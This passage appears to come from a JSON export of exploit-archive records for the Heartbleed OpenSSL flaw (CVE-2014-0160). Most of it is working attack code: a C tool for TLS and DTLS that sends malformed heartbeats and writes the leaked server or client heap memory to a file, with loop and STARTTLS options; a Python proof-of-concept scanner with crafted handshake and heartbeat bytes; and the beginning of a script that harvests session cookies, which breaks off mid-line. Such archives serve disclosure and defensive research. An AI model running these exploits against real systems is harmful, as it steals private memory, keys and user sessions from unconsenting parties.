<3\\n\"); \n \nret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16); \n \nif (ret >= 0) \n{ \nif (c->sslHandle->msg_callback) \nc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT, \nbuf, 3 + 16, \nc->sslHandle, c->sslHandle->msg_callback_arg); \n \ndtls1_start_timer(c->sslHandle); \nc->sslHandle->tlsext_hb_pending = 1; \n} \n \nOPENSSL_free(buf); \n \nreturn c; \n} \n \nvoid* sneakyleaky(connection *c,char* filename, int verbose){ \nchar *p; \nint ssl_major,ssl_minor,al; \nint enc_err,n,i; \nSSL3_RECORD *rr; \nSSL_SESSION *sess; \nSSL* s; \nunsigned char md[EVP_MAX_MD_SIZE]; \nshort version; \nunsigned mac_size, orig_len; \nsize_t extra; \nrr= &(c->sslHandle->s3->rrec); \nsess=c->sslHandle->session; \ns = c->sslHandle; \nif (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER) \nextra=SSL3_RT_MAX_EXTRA; \nelse \nextra=0; \nif ((s->rstate != SSL_ST_READ_BODY) || \n(s->packet_length < SSL3_RT_HEADER_LENGTH)) { \nn=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); \nif (n <= 0) \ngoto apple; \ns->rstate=SSL_ST_READ_BODY; \np=s->packet; \nrr->type= *(p++); \nssl_major= *(p++); \nssl_minor= *(p++); \nversion=(ssl_major<<8)|ssl_minor; \nn2s(p,rr->length); \nif(rr->type==24){ \nprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length); \nif(rr->length > 16834){ \nprintf(\"[ error: got a malformed TLS length.\\n\"); \nexit(0); \n} \n} \nelse{ \nprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length); \ns->packet_length=0; \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \ngoto apple; \n} \n} \nif (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){ \ni=rr->length; \nn=ssl3_read_n(s,i,i,1); \nif (n <= 0) goto apple; \n} \nprintf(\"[ decrypting SSL packet\\n\"); \ns->rstate=SSL_ST_READ_HEADER; \nrr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]); \nrr->data=rr->input; \ntls1_enc(s,0); \nif((sess != NULL) && 
\n(s->enc_read_ctx != NULL) && \n(EVP_MD_CTX_md(s->read_hash) != NULL)) \n{ \nunsigned char *mac = NULL; \nunsigned char mac_tmp[EVP_MAX_MD_SIZE]; \nmac_size=EVP_MD_CTX_size(s->read_hash); \nOPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); \norig_len = rr->length+((unsigned int)rr->type>>8); \nif(orig_len < mac_size || \n(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && \norig_len < mac_size+1)){ \nal=SSL_AD_DECODE_ERROR; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); \n} \nif (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ \nmac = mac_tmp; \nssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); \nrr->length -= mac_size; \n} \nelse{ \nrr->length -= mac_size; \nmac = &rr->data[rr->length]; \n} \ni = tls1_mac(s,md,0); \nif (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) \nenc_err = -1; \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size) \nenc_err = -1; \n} \nif(enc_err < 0){ \nal=SSL_AD_BAD_RECORD_MAC; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); \ngoto apple; \n} \nif(s->expand != NULL){ \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); \ngoto apple; \n} \nif (!ssl3_do_uncompress(s)) { \nal=SSL_AD_DECOMPRESSION_FAILURE; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); \ngoto apple; \n} \n} \nif (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); \ngoto apple; \n} \nrr->off=0; \ns->packet_length=0; \nif(first==0){ \nuint heartbleed_len = 0; \nchar* fp = s->s3->rrec.data; \n(long)fp++; \nmemcpy(&heartbleed_len,fp,2); \nheartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; \nfirst = 2; \nleakbytes = heartbleed_len + 16; \nprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len); \n} \nif(verbose==1){ \n{ unsigned int z; for (z=0; z<rr->length; z++) 
printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); } \nprintf(\"\\n\"); \n} \nleakbytes-=rr->length; \nif(leakbytes > 0){ \nrepeat = 1; \n} \nelse{ \nrepeat = 0; \n} \nprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length); \nint output = s->s3->rrec.length-3; \nif(output > 0){ \nint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); \nif(first==2){ \nfirst--; \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \n/* first three bytes are resp+len */ \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename); \n} \nelse{ \n/* heap data & 16 bytes padding */ \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename); \n} \nclose(fd); \n} \nelse{ \nprintf(\"[ nothing from the heap to write\\n\"); \n} \nreturn; \napple: \nprintf(\"[ problem handling SSL record packet - wrong type?\\n\"); \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \nreturn; \n} \n \n \nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){ \nchar *p; \nint ssl_major,ssl_minor,al; \nint enc_err,n,i; \nSSL3_RECORD *rr; \nSSL_SESSION *sess; \nSSL* s; \nDTLS1_BITMAP *bitmap; \nunsigned int is_next_epoch; \nunsigned char md[EVP_MAX_MD_SIZE]; \nshort version; \nunsigned int mac_size, orig_len; \n \nrr= &(c->sslHandle->s3->rrec); \nsess=c->sslHandle->session; \ns = c->sslHandle; \n \nagain: \nif ((s->rstate != SSL_ST_READ_BODY) || \n(s->packet_length < DTLS1_RT_HEADER_LENGTH)) { \nn=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); \nif (n <= 0) \ngoto apple; \n \ns->rstate=SSL_ST_READ_BODY; \np=s->packet; \nrr->type= *(p++); \nssl_major= *(p++); \nssl_minor= *(p++); \nversion=(ssl_major<<8)|ssl_minor; \nn2s(p,rr->epoch); \nmemcpy(&(s->s3->read_sequence[2]), p, 6); \np+=6; \nn2s(p,rr->length); \nif(rr->type==24){ \nprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length); \nif(rr->length > 
16834){ \nprintf(\"[ error: got a malformed TLS length.\\n\"); \nexit(0); \n} \n} \nelse{ \nprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length); \ns->packet_length=0; \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \ngoto apple; \n} \n} \n \nif (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){ \ni=rr->length; \nn=ssl3_read_n(s,i,i,1); \nif (n <= 0) goto apple; \n} \nif ( n != i) \n{ \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \nprintf(\"[ decrypting SSL packet\\n\"); \ns->rstate=SSL_ST_READ_HEADER; \n \nbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch); \nif ( bitmap == NULL) \n{ \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \n \nif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE && \n*p == SSL3_MT_CLIENT_HELLO) && \n!dtls1_record_replay_check(s, bitmap)) \n{ \nrr->length = 0; \ns->packet_length=0; \ngoto again; \n} \n \nif (rr->length == 0) goto again; \nif (is_next_epoch) \n{ \nif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen) \n{ \ndtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num); \n} \nrr->length = 0; \ns->packet_length = 0; \ngoto again; \n} \n \n \nrr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]); \nrr->data=rr->input; \norig_len=rr->length; \n \ndtls1_enc(s,0); \n \nif((sess != NULL) && \n(s->enc_read_ctx != NULL) && \n(EVP_MD_CTX_md(s->read_hash) != NULL)) \n{ \nunsigned char *mac = NULL; \nunsigned char mac_tmp[EVP_MAX_MD_SIZE]; \nmac_size=EVP_MD_CTX_size(s->read_hash); \nOPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); \norig_len = rr->length+((unsigned int)rr->type>>8); \nif(orig_len < mac_size || \n(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && \norig_len < mac_size+1)){ \nal=SSL_AD_DECODE_ERROR; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); \n} \nif (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ \nmac = mac_tmp; \nssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); 
\nrr->length -= mac_size; \n} \nelse{ \nrr->length -= mac_size; \nmac = &rr->data[rr->length]; \n} \ni = tls1_mac(s,md,0); \n \nif (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) \nenc_err = -1; \n \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size) \nenc_err = -1; \n} \nif(enc_err < 0){ \nal=SSL_AD_BAD_RECORD_MAC; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); \ngoto apple; \n} \nif(s->expand != NULL){ \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); \ngoto apple; \n} \nif (!ssl3_do_uncompress(s)) { \nal=SSL_AD_DECOMPRESSION_FAILURE; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); \ngoto apple; \n} \n} \n \nif (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); \ngoto apple; \n} \nrr->off=0; \ns->packet_length=0; \ndtls1_record_bitmap_update(s, &(s->d1->bitmap)); \nif(first==0){ \nuint heartbleed_len = 0; \nchar* fp = s->s3->rrec.data; \n(long)fp++; \nmemcpy(&heartbleed_len,fp,2); \nheartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; \nfirst = 2; \nleakbytes = heartbleed_len + 16; \nprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len); \n} \nif(verbose==1){ \n{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' 
':'\\n'); } \nprintf(\"\\n\"); \n} \nleakbytes-=rr->length; \nif(leakbytes > 0){ \nrepeat = 1; \n} \nelse{ \nrepeat = 0; \n} \nprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length); \nint output = s->s3->rrec.length-3; \nif(output > 0){ \nint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); \nif(first==2){ \nfirst--; \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \n/* first three bytes are resp+len */ \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename); \n} \nelse{ \n/* heap data & 16 bytes padding */ \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename); \n} \nclose(fd); \n} \nelse{ \nprintf(\"[ nothing from the heap to write\\n\"); \n} \n \ndtls1_stop_timer(c->sslHandle); \nc->sslHandle->tlsext_hb_seq++; \nc->sslHandle->tlsext_hb_pending = 0; \n \nreturn; \napple: \nprintf(\"[ problem handling SSL record packet - wrong type?\\n\"); \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \nreturn; \n} \n \nstatic DTLS1_BITMAP * \ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch) \n{ \n \n*is_next_epoch = 0; \n \nif (rr->epoch == s->d1->r_epoch) \nreturn &s->d1->bitmap; \n \nelse if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) && \n(rr->type == SSL3_RT_HANDSHAKE || \nrr->type == SSL3_RT_ALERT)) \n{ \n*is_next_epoch = 1; \nreturn &s->d1->next_bitmap; \n} \n \nreturn NULL; \n} \n \nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap) \n{ \nint cmp; \nunsigned int shift; \nconst unsigned char *seq = s->s3->read_sequence; \n \ncmp = satsub64be(seq,bitmap->max_seq_num); \nif (cmp > 0) \n{ \nmemcpy (s->s3->rrec.seq_num,seq,8); \nreturn 1; \n} \nshift = -cmp; \nif (shift >= sizeof(bitmap->map)*8) \nreturn 0; \nelse if (bitmap->map & (1UL<<shift)) \nreturn 0; \n \nmemcpy (s->s3->rrec.seq_num,seq,8); \nreturn 1; \n} \n \nint satsub64be(const 
unsigned char *v1,const unsigned char *v2) \n{ int ret,sat,brw,i; \n \nif (sizeof(long) == 8) do \n{ const union { long one; char little; } is_endian = {1}; \nlong l; \n \nif (is_endian.little) break; \n \nif (((size_t)v1|(size_t)v2)&0x7) break; \n \nl = *((long *)v1); \nl -= *((long *)v2); \nif (l>128) return 128; \nelse if (l<-128) return -128; \nelse return (int)l; \n} while (0); \n \nret = (int)v1[7]-(int)v2[7]; \nsat = 0; \nbrw = ret>>8; \nif (ret & 0x80) \n{ for (i=6;i>=0;i--) \n{ brw += (int)v1[i]-(int)v2[i]; \nsat |= ~brw; \nbrw >>= 8; \n} \n} \nelse \n{ for (i=6;i>=0;i--) \n{ brw += (int)v1[i]-(int)v2[i]; \nsat |= brw; \nbrw >>= 8; \n} \n} \nbrw <<= 8; \n \nif (sat&0xff) return brw | 0x80; \nelse return brw + (ret&0xFF); \n} \n \nstatic int \ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority) \n{ \nDTLS1_RECORD_DATA *rdata; \npitem *item; \n \nif (pqueue_size(queue->q) >= 100) \nreturn 0; \n \nrdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA)); \nitem = pitem_new(priority, rdata); \nif (rdata == NULL || item == NULL) \n{ \nif (rdata != NULL) OPENSSL_free(rdata); \nif (item != NULL) pitem_free(item); \n \nSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR); \nreturn(0); \n} \n \nrdata->packet = s->packet; \nrdata->packet_length = s->packet_length; \nmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER)); \nmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD)); \n \nitem->data = rdata; \n \n#ifndef OPENSSL_NO_SCTP \nif (BIO_dgram_is_sctp(SSL_get_rbio(s)) && \n(s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) { \nBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo); \n} \n#endif \n \nif (pqueue_insert(queue->q, item) == NULL) \n{ \nOPENSSL_free(rdata); \npitem_free(item); \nreturn(0); \n} \n \ns->packet = NULL; \ns->packet_length = 0; \nmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER)); \nmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD)); \n \nif 
(!ssl3_setup_buffers(s)) \n{ \nSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR); \nOPENSSL_free(rdata); \npitem_free(item); \nreturn(0); \n} \n \nreturn(1); \n} \n \n \nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap) \n{ \nint cmp; \nunsigned int shift; \nconst unsigned char *seq = s->s3->read_sequence; \n \ncmp = satsub64be(seq,bitmap->max_seq_num); \nif (cmp > 0) \n{ \nshift = cmp; \nif (shift < sizeof(bitmap->map)*8) \nbitmap->map <<= shift, bitmap->map |= 1UL; \nelse \nbitmap->map = 1UL; \nmemcpy(bitmap->max_seq_num,seq,8); \n} \nelse { \nshift = -cmp; \nif (shift < sizeof(bitmap->map)*8) \nbitmap->map |= 1UL<<shift; \n} \n} \n \n \nvoid usage(){ \nprintf(\"[\\n\"); \nprintf(\"[ --server|-s <ip/dns> - the server to target\\n\"); \nprintf(\"[ --port|-p <port> - the port to target\\n\"); \nprintf(\"[ --file|-f <filename> - file to write data to\\n\"); \nprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\"); \nprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\"); \nprintf(\"[ 0 = SMTP\\n\"); \nprintf(\"[ 1 = POP3\\n\"); \nprintf(\"[ 2 = IMAP\\n\"); \nprintf(\"[ --loop|-l - loop the exploit attempts\\n\"); \nprintf(\"[ --type|-t <n> - select exploit to try\\n\"); \nprintf(\"[ 0 = null length\\n\"); \nprintf(\"[ 1 = max leak\\n\"); \nprintf(\"[ n = heartbeat payload_length\\n\"); \nprintf(\"[ --udp|-u - use dtls/udp\\n\"); \nprintf(\"[\\n\"); \nprintf(\"[ --verbose|-v - output leak to screen\\n\"); \nprintf(\"[ --help|-h - this output\\n\"); \nprintf(\"[\\n\"); \nexit(0); \n} \n \nint main(int argc, char* argv[]){ \nint ret, port, userc, index; \nint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9; \nint loop = 0; \nstruct hostent *h; \nconnection* c; \nchar *host, *file; \nint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0; \nprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\"); \nprintf(\"[ =============================================================\\n\"); \nstatic 
struct option options[] = { \n{\"server\", 1, 0, 's'}, \n{\"port\", 1, 0, 'p'}, \n{\"file\", 1, 0, 'f'}, \n{\"type\", 1, 0, 't'}, \n{\"bind\", 1, 0, 'b'}, \n{\"verbose\", 0, 0, 'v'}, \n{\"precmd\", 1, 0, 'c'}, \n{\"loop\", 0, 0, 'l'}, \n{\"help\", 0, 0,'h'}, \n{\"udp\", 0, 0, 'u'} \n}; \nwhile(userc != -1) { \nuserc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \nswitch(userc) { \ncase -1: \nbreak; \ncase 's': \nif(ihost==0){ \nihost = 1; \nh = gethostbyname(optarg); \nif(h==NULL){ \nprintf(\"[!] FATAL: unknown host '%s'\\n\",optarg); \nexit(1); \n} \nhost = malloc(strlen(optarg) + 1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \n} \nbreak; \ncase 'p': \nif(iport==0){ \nport = atoi(optarg); \niport = 1; \n} \nbreak; \ncase 'f': \nif(ifile==0){ \nfile = malloc(strlen(optarg) + 1); \nif(file==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(file,\"%s\",optarg); \nifile = 1; \n} \nbreak; \ncase 't': \nif(itype==0){ \ntype = atoi(optarg); \nitype = 1; \n} \nbreak; \ncase 'h': \nusage(); \nbreak; \ncase 'b': \nif(ihost==0){ \nihost = 1; \nhost = malloc(strlen(optarg)+1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \nbind = 1; \n} \nbreak; \ncase 'c': \nif(iprecmd == 0){ \niprecmd = 1; \nprecmd = atoi(optarg); \n} \nbreak; \ncase 'v': \nverbose = 1; \nbreak; \ncase 'l': \nloop = 1; \nbreak; \ncase 'u': \nudp = 1; \nbreak; \n \ndefault: \nbreak; \n} \n} \nif(ihost==0||iport==0||ifile==0||itype==0){ \nprintf(\"[ try --help\\n\"); \nexit(0); \n} \nssl_init(); \nif(bind==0){ \nif (udp){ \nc = dtls_client(ret, host, port); \ndtlsheartbleed(c, type); \ndtlssneakyleaky(c,file,verbose); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=1; \ndtlsheartbleed(c,type); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \n} \n} \nelse { 
\nret = tcp_connect(host, port); \npre_cmd(ret, precmd, verbose); \nc = tls_connect(ret); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=1; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \n} \n \nSSL_shutdown(c->sslHandle); \nclose (ret); \nSSL_free(c->sslHandle); \n} \nelse{ \nint sd, pid, i; \nif (udp) { \nc = dtls_server(sd, host, port); \nwhile (1) { \nchar * bytes = malloc(1024); \nstruct sockaddr_in peer; \nsocklen_t len = sizeof(peer); \nif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) { \ndtlsheartbleed(c,type); \ndtlssneakyleaky(c,file,verbose); \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=0; \ndtlsheartbleed(c,type); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \n} \n} \n} \n} \nelse { \nret = tcp_bind(host, port); \nwhile(1){ \nsd=accept(ret,0,0); \nif(sd==-1){ \nprintf(\"[!] 
FATAL: problem with accept()\\n\"); \nexit(0); \n} \nif(pid=fork()){ \nclose(sd); \n} \nelse{ \nc = tls_bind(sd); \npre_cmd(ret, precmd, verbose); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=0; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \nprintf(\"[ done.\\n\"); \nexit(0); \n} \n} \n} \n} \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126308/heartbleeddtls-leak.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:16:50", "description": "", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "packetstorm", "title": "Heartbleed Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "PACKETSTORM:126070", "href": "https://packetstormsecurity.com/files/126070/Heartbleed-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. 
\n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? 
\nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' 
\nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126070/ssltest.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:25:28", "description": "", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "packetstorm", "title": "Heartbleed User Session Extraction", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "PACKETSTORM:126069", "href": "https://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html", "sourceData": "`#!/usr/bin/python \n \n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. \n# Michael Davis (mike.philip.davis@gmail.com) \n \n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n \n# The author disclaims copyright to this source code. \n \nimport select \nimport sys \nimport string \nimport struct \nimport socket \nimport time \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. 
